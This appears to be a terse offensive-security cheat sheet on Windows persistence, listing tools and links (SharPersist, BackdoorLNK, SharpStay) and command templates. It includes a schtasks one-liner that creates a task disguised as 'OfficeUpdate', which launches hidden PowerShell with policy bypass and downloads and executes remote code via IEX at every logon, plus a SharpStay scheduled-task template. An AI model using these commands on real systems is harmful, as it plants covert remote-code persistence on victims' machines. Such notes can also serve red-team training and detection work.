Persistence

Sharpersist

https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html

https://github.com/fireeye/SharPersist

LNK

https://github.com/HarmJ0y/Misc-PowerShell/blob/master/BackdoorLNK.ps1

Scheduled tasks

SharpStay

UserLand

SharpStay.exe action=ScheduledTask taskname=<task_name> command="<C:\<...>\<persist.exe>" runasuser=<username> triggertype=logon author=<username> description="<task description>" logonuser=<username>

Old: https://blog.cobaltstrike.com/2013/11/09/schtasks-persistence-with-powershell-one-liners/

https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and-com-handler-hijacking/

schtasks /create /tn OfficeUpdate /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''<url>''))'" /sc onlogon /f

WMI

Custom class